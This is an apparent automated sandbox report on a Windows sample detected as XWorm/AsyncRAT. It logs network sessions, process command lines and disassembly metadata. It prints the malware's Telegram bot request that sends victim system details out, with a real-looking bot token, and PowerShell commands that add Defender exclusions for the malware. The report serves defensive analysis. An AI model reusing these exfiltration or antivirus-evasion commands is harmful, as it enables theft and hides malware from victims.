Jul 26, 2024 21:22:54.100698948 CEST | 1.1.1.1 | 192.168.2.6 | 0xc97b | No error (0) | api.telegram.org | | 149.154.167.220 | A (IP address) | IN (0x0001) | false
Jul 26, 2024 21:22:55.328250885 CEST | 1.1.1.1 | 192.168.2.6 | 0xa167 | No error (0) | main-although.gl.at.ply.gg | | 147.185.221.21 | A (IP address) | IN (0x0001) | false

• api.telegram.org
• ip-api.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49710 | 208.95.112.1 | 80 | 6496 | C:\Users\user\Desktop\VJV2AjJ7Na.exe

Timestamp | Bytes transferred | Direction | Data
Jul 26, 2024 21:21:59.871692896 CEST | 80 | OUT | GET /line/?fields=hosting HTTP/1.1
Host: ip-api.com
Connection: Keep-Alive
Jul 26, 2024 21:22:00.370646954 CEST | 175 | IN | HTTP/1.1 200 OK
Date: Fri, 26 Jul 2024 19:22:00 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 6
Access-Control-Allow-Origin: *
X-Ttl: 60
X-Rl: 44
Data Raw: 66 61 6c 73 65 0a
Data Ascii: false


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49719 | 149.154.167.220 | 443 | 6496 | C:\Users\user\Desktop\VJV2AjJ7Na.exe

Timestamp | Bytes transferred | Direction | Data
2024-07-26 19:22:54 UTC | 448 | OUT | GET /bot7208700451:AAHHz5xWybJ91pH6F9vJRw8dcMEBlRiBXKs/sendMessage?chat_id=6131620354&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A55D979A7C4323CB5C4DA%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20D3K68%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.6 HTTP/1.1
Host: api.telegram.org
Connection: Keep-Alive
2024-07-26 19:22:55 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Fri, 26 Jul 2024 19:22:55 GMT
Content-Type: application/json
Content-Length: 505
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-07-26 19:22:55 UTC | 505 | IN | Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 30 38 37 30 30 34 35 31 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 67 6f 76 6e 6f 31 32 33 5f 62 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 64 6a 77 64 6a 77 61 77 61 6a 68 64 77 6a 61 6b 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 31 33 31 36 32 30 33 35 34 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 23 5c 75 30 34 34 37 5c 75 30 34 34 33 5c 75 30 34 34 38 5c 75 30 34 33 61 5c 75 30 34 33 30 5c 75 64 38 33 64 5c 75 64 63 36 38 5c 75 32 30 30 64 5c 75 64 38 33 64 5c 75 64 63 62 62 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 43 42 41 54
Data Ascii: {"ok":true,"result":{"message_id":66,"from":{"id":7208700451,"is_bot":true,"first_name":"govno123_bot","username":"djwdjwawajhdwjak_bot"},"chat":{"id":6131620354,"first_name":"#\u0447\u0443\u0448\u043a\u0430\ud83d\udc68\u200d\ud83d\udcbb","username":"CBAT


Target ID: 0
Start time: 15:21:55
Start date: 26/07/2024
Path: C:\Users\user\Desktop\VJV2AjJ7Na.exe
Wow64 process (32bit): false
Commandline: "C:\Users\user\Desktop\VJV2AjJ7Na.exe"
Imagebase: 0x7f0000
File size: 71'168 bytes
MD5 hash: 99088D7D8B409B4039B02295E64A686F
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000000.2103665413.00000000007F2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
• Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000000.2103665413.00000000007F2000.00000002.00000001.01000000.00000003.sdmp, Author: ditekSHen
• Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.3360702564.00000000029A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.3360702564.0000000002A00000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation: low
Has exited: false

Target ID: 2
Start time: 15:22:00
Start date: 26/07/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VJV2AjJ7Na.exe'
Imagebase: 0x7ff6e3d50000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 3
Start time: 15:22:00
Start date: 26/07/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff66e660000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

                                                                        Target ID:5
                                                                        Start time:15:22:06
                                                                        Start date:26/07/2024
                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'VJV2AjJ7Na.exe'
                                                                        Imagebase:0x7ff6e3d50000
                                                                        File size:452'608 bytes
                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Target ID:6
                                                                        Start time:15:22:06
                                                                        Start date:26/07/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff66e660000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Target ID:8
                                                                        Start time:15:22:16
                                                                        Start date:26/07/2024
                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe'
                                                                        Imagebase:0x7ff6e3d50000
                                                                        File size:452'608 bytes
                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Target ID:9
                                                                        Start time:15:22:16
                                                                        Start date:26/07/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff66e660000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Target ID:10
                                                                        Start time:15:22:30
                                                                        Start date:26/07/2024
                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
                                                                        Imagebase:0x7ff6e3d50000
                                                                        File size:452'608 bytes
                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Target ID:11
                                                                        Start time:15:22:30
                                                                        Start date:26/07/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff66e660000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                          Execution Graph

                                                                          Execution Coverage:22.2%
                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                          Signature Coverage:50%
                                                                          Total number of Nodes:6
                                                                          Total number of Limit Nodes:0

                                                                          Control-flow Graph

                                                                          control_flow_graph 0 7ffd346910fa-7ffd34691141 3 7ffd34691176-7ffd3469117a 0->3 4 7ffd34691143-7ffd34691149 0->4 5 7ffd3469117e-7ffd346911ae 3->5 4->5 6 7ffd3469114b-7ffd34691175 4->6 11 7ffd346911b5-7ffd346911b6 5->11 12 7ffd346911b0 5->12 6->3 13 7ffd346911b8 11->13 14 7ffd346911bc-7ffd346911be 11->14 12->11 13->14 15 7ffd346911c0 14->15 16 7ffd346911c3-7ffd346911c6 14->16 15->16 17 7ffd346911c8 16->17 18 7ffd346911ca-7ffd346911ce 16->18 17->18 19 7ffd346911d0 18->19 20 7ffd346911d1-7ffd34691210 18->20 19->20 23 7ffd34691216-7ffd3469138b call 7ffd34690638 * 10 call 7ffd34690a30 20->23 24 7ffd3469183c-7ffd34691883 20->24 74 7ffd34691395-7ffd3469140c call 7ffd346904c0 call 7ffd346904b8 call 7ffd34690348 call 7ffd34690358 23->74 75 7ffd3469138d-7ffd34691394 23->75 90 7ffd3469140e-7ffd34691418 74->90 91 7ffd3469141f-7ffd3469142f 74->91 75->74 90->91 94 7ffd34691457-7ffd34691477 91->94 95 7ffd34691431-7ffd34691450 call 7ffd34690348 91->95 101 7ffd34691488-7ffd3469156a 94->101 102 7ffd34691479-7ffd34691483 call 7ffd34690368 94->102 95->94 116 7ffd346915b8-7ffd346915eb 101->116 117 7ffd3469156c-7ffd3469159f 101->117 102->101 127 7ffd346915ed-7ffd3469160e 116->127 128 7ffd34691610-7ffd34691640 116->128 117->116 124 7ffd346915a1-7ffd346915ae 117->124 124->116 129 7ffd346915b0-7ffd346915b6 124->129 131 7ffd34691648-7ffd3469167f 127->131 128->131 129->116 137 7ffd34691681-7ffd346916a2 131->137 138 7ffd346916a4-7ffd346916d4 131->138 140 7ffd346916dc-7ffd34691765 call 7ffd34690378 call 7ffd346909d0 call 7ffd34691018 137->140 138->140 152 7ffd34691767 call 7ffd346907d0 140->152 153 7ffd3469176c call 7ffd346904b0 140->153 152->153 156 7ffd34691771-7ffd3469180a 153->156
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3399090700.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ffd34690000_VJV2AjJ7Na.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 3L_^$SAL_^
                                                                          • API String ID: 0-2916792836
                                                                          • Opcode ID: ef7a7c78c27219ccab637137c45e3e3d3801e1a24c4c8120efe9a128c650a04e
                                                                          • Instruction ID: 3033a04943e8291265b939e3a6c2a6d5ac5da4dc74210cfa61f1c61b28721391
                                                                          • Opcode Fuzzy Hash: ef7a7c78c27219ccab637137c45e3e3d3801e1a24c4c8120efe9a128c650a04e
                                                                          • Instruction Fuzzy Hash: D5220461B1DB1A0BE794BBBC94A92FD77D1FF99311F40057EE14EC3292DE68A8018781

                                                                          Control-flow Graph

                                                                          control_flow_graph 173 7ffd346972a1-7ffd346972ba 174 7ffd346972bc-7ffd346972ef 173->174 175 7ffd346972f0-7ffd3469735d CheckRemoteDebuggerPresent 173->175 174->175 179 7ffd34697365-7ffd346973a8 175->179 180 7ffd3469735f 175->180 180->179
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3399090700.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ffd34690000_VJV2AjJ7Na.jbxd
                                                                          Similarity
                                                                          • API ID: CheckDebuggerPresentRemote
                                                                          • String ID:
                                                                          • API String ID: 3662101638-0
                                                                          • Opcode ID: 0232821da32e4c53681d525db8573f907571535c3fde307876a93e6593ff193c
                                                                          • Instruction ID: dd048c9357db960a979d9b7ec59b2897cab8c51bd2cf1076e3f58f45d0c17886
                                                                          • Opcode Fuzzy Hash: 0232821da32e4c53681d525db8573f907571535c3fde307876a93e6593ff193c
                                                                          • Instruction Fuzzy Hash: CE31023190875C8FCB58DF98C88A7E97BE0FF65311F05426AD489D7292DB34A846CB91
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3399090700.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ffd34690000_VJV2AjJ7Na.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: d9e8bf1924eadd95ba316f8aa4087b299f8d2850bc188d565f82174caba11934
                                                                          • Instruction ID: ecdbc2229e01738d47c44c3363a4320b90a771859695dea2d53bb49a9ba80a92
                                                                          • Opcode Fuzzy Hash: d9e8bf1924eadd95ba316f8aa4087b299f8d2850bc188d565f82174caba11934
                                                                          • Instruction Fuzzy Hash: 34F1B63160CA4E8FEBA8DF28C8657E937E1FF55310F04426EE84DC7291DB7999458B81
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3399090700.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ffd34690000_VJV2AjJ7Na.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: ace6e2820f8f7a85488dee7a0c35a073dd08f7d633fa06e89bf7e464b1b546b2
                                                                          • Instruction ID: a7b3a5215c035da3436316db88edeeb904479f68d0a6db6e97b89593d6151050
                                                                          • Opcode Fuzzy Hash: ace6e2820f8f7a85488dee7a0c35a073dd08f7d633fa06e89bf7e464b1b546b2
                                                                          • Instruction Fuzzy Hash: D6E1A530608A4E8FEBA8DF28C8657E977E1FF55310F14426EE84DC7295DF7898458B81
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3399090700.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ffd34690000_VJV2AjJ7Na.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 83ba8d78b44b40854248828f5a9b6f46b323e98bdf35722a6197682c93c163a7
                                                                          • Instruction ID: 58914d545728586680b059f86085170e732360934eaaa734cfddc9e4e89a0a2e
                                                                          • Opcode Fuzzy Hash: 83ba8d78b44b40854248828f5a9b6f46b323e98bdf35722a6197682c93c163a7
                                                                          • Instruction Fuzzy Hash: 22C1C061B1CA594FFB98EF6C84B52F977D2EF9A304F14417AD04ED32D2DE68A8029341

                                                                          Control-flow Graph

                                                                          control_flow_graph 166 7ffd34698d9d-7ffd34698e80 RtlSetProcessIsCritical 170 7ffd34698e88-7ffd34698ebd 166->170 171 7ffd34698e82 166->171 171->170
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3399090700.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ffd34690000_VJV2AjJ7Na.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalProcess
                                                                          • String ID:
                                                                          • API String ID: 2695349919-0
                                                                          • Opcode ID: 57432d8bff2fade5ddf6da13533e7ee79e75570a6329053a24e35c350b11b98b
                                                                          • Instruction ID: 5eb6ca2d877ebc9d17c01d3b16a255048816983b38d7aad112568613b1214b1e
                                                                          • Opcode Fuzzy Hash: 57432d8bff2fade5ddf6da13533e7ee79e75570a6329053a24e35c350b11b98b
                                                                          • Instruction Fuzzy Hash: 0841043190C6588FDB29DFA8C855AE97BF0FF56311F04416ED08AD3692CB746846CB91

                                                                          Control-flow Graph

                                                                          control_flow_graph 182 7ffd346985fa-7ffd34698e1a 186 7ffd34698e22-7ffd34698e80 RtlSetProcessIsCritical 182->186 187 7ffd34698e88-7ffd34698ebd 186->187 188 7ffd34698e82 186->188 188->187
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3399090700.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ffd34690000_VJV2AjJ7Na.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalProcess
                                                                          • String ID:
                                                                          • API String ID: 2695349919-0
                                                                          • Opcode ID: f6cde66d0e3ae73122444bd41103692458bc5992e210c69288790ef0c722d418
                                                                          • Instruction ID: e64ffb9e1854c4d76c7a5015672ba16116f722837ad5c28e8c8a47f2829e71bb
                                                                          • Opcode Fuzzy Hash: f6cde66d0e3ae73122444bd41103692458bc5992e210c69288790ef0c722d418
                                                                          • Instruction Fuzzy Hash: 2C31F63190CA588FDB29DF98D8557E97BE0FF65311F14012ED08AD3682CB746846CB91
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3399090700.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ffd34690000_VJV2AjJ7Na.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 3eb287fbb3db074677ae68b9d197de9b8c3baf1a2bd5ebde02773aa6eb059bfd
                                                                          • Instruction ID: 5bddd4ea616c1d07892446226de6e14204ece2676cb488b3703eb79a0a0a1894
                                                                          • Opcode Fuzzy Hash: 3eb287fbb3db074677ae68b9d197de9b8c3baf1a2bd5ebde02773aa6eb059bfd
                                                                          • Instruction Fuzzy Hash: 7B71C72064F7C55FE7479738D8A8AE97F91AF83325F0D41FAE088CA4A3DAD94506C742
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3399090700.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ffd34690000_VJV2AjJ7Na.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 198dbc58072b2d16336fbcfd3ef618a8e77ac1ca1fca21d53114327b364b6ea5
                                                                          • Instruction ID: c7e6664d3485ebae105958ef7b5c20c9872b3898f26f9739e90c77737c661038
                                                                          • Opcode Fuzzy Hash: 198dbc58072b2d16336fbcfd3ef618a8e77ac1ca1fca21d53114327b364b6ea5
                                                                          • Instruction Fuzzy Hash: 37615F57A0E7D21EE6639A6C68F50E63F90DF6326970904F7C2D4CF0A3DD4C244AA262
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.3399090700.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ffd34690000_VJV2AjJ7Na.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 69c44040f3c249a8dc9bd7c9628830e4b43356d89a8544118730a2cb6be61e49
                                                                          • Instruction ID: 737ce68007fff38575acbc6b3d899ac5ec507e0469923a42ceb7f932a19fb06e
                                                                          • Opcode Fuzzy Hash: 69c44040f3c249a8dc9bd7c9628830e4b43356d89a8544118730a2cb6be61e49
                                                                          • Instruction Fuzzy Hash: 0F419767F0E7D21BE6A2CA6C58F50E53F90EF2326471909F7C285CF097DD5C144A6212
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.2207655880.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_7ffd34690000_powershell.jbxd
                                                                          • Instruction ID: 764501a67d11ed0860ae91f4959a25dbeba5e7ac276b2fd5755305ac5949f7d5
                                                                          • Opcode Fuzzy Hash: 61c758adb60d4a5df91feb04fa8eeaa90770c4cabc7cfc590297a070ffeda33f
                                                                          • Instruction Fuzzy Hash: 0ED15D31A08A5E8FDF94DF58C4A5AE97BF1FF69304F14416AD40DD7296CA38E881CB81
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2440355072.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_7ffd34680000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 4da8b45e9bde278870347714e968cf7a504ed5116c1d18f39156fe62a6d1d6b3
                                                                          • Instruction ID: f465358208d991e1aba001b3e19d615a27b106a6a56b8bf0f4f6715c7ddee503
                                                                          • Opcode Fuzzy Hash: 4da8b45e9bde278870347714e968cf7a504ed5116c1d18f39156fe62a6d1d6b3
                                                                          • Instruction Fuzzy Hash: 29413A72A0CA885FDB589F1C9C566F8BBE1FB55310F04412FE549D3283DA24E815CBC2
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2439405846.00007FFD3456D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3456D000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_7ffd3456d000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: ba8d5fe947ba862150cc1931a03eb569cf2c30c95053434463429f8e99a38f81
                                                                          • Instruction ID: a4e34f1c27542ba196f92ec6f6010c1e130e7ceaee0133c25b2605abd252cb2e
                                                                          • Opcode Fuzzy Hash: ba8d5fe947ba862150cc1931a03eb569cf2c30c95053434463429f8e99a38f81
                                                                          • Instruction Fuzzy Hash: A841F37180EBC45FE7579B2898959523FF0EF57220B1906DFD088CB1A3D629A846C7A2
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2440355072.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_7ffd34680000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 40d2a7945c92950ae5a391e18145864f41dcb3fab868b436e4ee40723a3b2f02
                                                                          • Instruction ID: 701a157e126cc5f102508d5453de1479d8c0b0462a9c522b157c9d492247cecf
                                                                          • Opcode Fuzzy Hash: 40d2a7945c92950ae5a391e18145864f41dcb3fab868b436e4ee40723a3b2f02
                                                                          • Instruction Fuzzy Hash: F3212831A0CB4C8FDB59DFAC9C4A7E97FE0EB96320F04416BD448C3152DA74945ACB92
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2441266702.00007FFD34750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34750000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_7ffd34750000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 0058fba77945e3f6603281fc734365074f0c4e594efb96c9d1a41128801cb14b
                                                                          • Instruction ID: f1f56e65c7f73f8459ed21fc540df6ac93c05e627bcbb5de0d2f1ca0965ff57e
                                                                          • Opcode Fuzzy Hash: 0058fba77945e3f6603281fc734365074f0c4e594efb96c9d1a41128801cb14b
                                                                          • Instruction Fuzzy Hash: 2A21E8B3B0DA568FE7A5EB1944E127476D2EF66210B5900FAD24DCB1D2DD1CFC069381
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2441266702.00007FFD34750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34750000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_7ffd34750000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 06ed9aebeceb3a0ccb4938c9b4885332fcd220e5aac5cfc10b95a417f871e495
                                                                          • Instruction ID: 0a198d45692b6c4e84adb575c0c6507b8420360dcd4d26ec05770dfafd078e16
                                                                          • Opcode Fuzzy Hash: 06ed9aebeceb3a0ccb4938c9b4885332fcd220e5aac5cfc10b95a417f871e495
                                                                          • Instruction Fuzzy Hash: 4C1136B2F0E6498FE7A4DB1884E46B877E0EF4622474800FAD15DCB0A3D91CBC1293C0
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2441266702.00007FFD34750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34750000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_7ffd34750000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: eacc5d59bcd1f4314ec96776f93ed83a5859e75d342e10bc00b2a1535c23c596
                                                                          • Instruction ID: b200309a5081f98b6c52e4dd35fe4e36116ac1a186ebc5d0f21993f2a6adb5c4
                                                                          • Opcode Fuzzy Hash: eacc5d59bcd1f4314ec96776f93ed83a5859e75d342e10bc00b2a1535c23c596
                                                                          • Instruction Fuzzy Hash: 68112772F0D6888FE765DA9844E556877D1EF1A314B1840FEC14CCB193D928B806C391
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2440355072.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_7ffd34680000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                          • Instruction ID: 99ccd9aa28ab21da87489c59e0d9d7a1036f9ae1a88a610e4ac9eb2b15120870
                                                                          • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                          • Instruction Fuzzy Hash: 2701677121CB0C4FD744EF0CE451AA5B7E0FB95364F10056DE58AC3651DA36E892CB45
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2440355072.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_7ffd34680000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 61401ea24719c3810c0cb162c28e8521e29beb4a1327bb23a7fc19ac4324c815
                                                                          • Instruction ID: d86af1fd9888a11fe91850efc29159b7576a2f8410dd15233a0ae0190b5f8c06
                                                                          • Opcode Fuzzy Hash: 61401ea24719c3810c0cb162c28e8521e29beb4a1327bb23a7fc19ac4324c815
                                                                          • Instruction Fuzzy Hash: EDE0E575908A4C8F9B55EF1898594E97BA0FB69301B04469AE809C6120DB719958CBC2
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2440355072.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
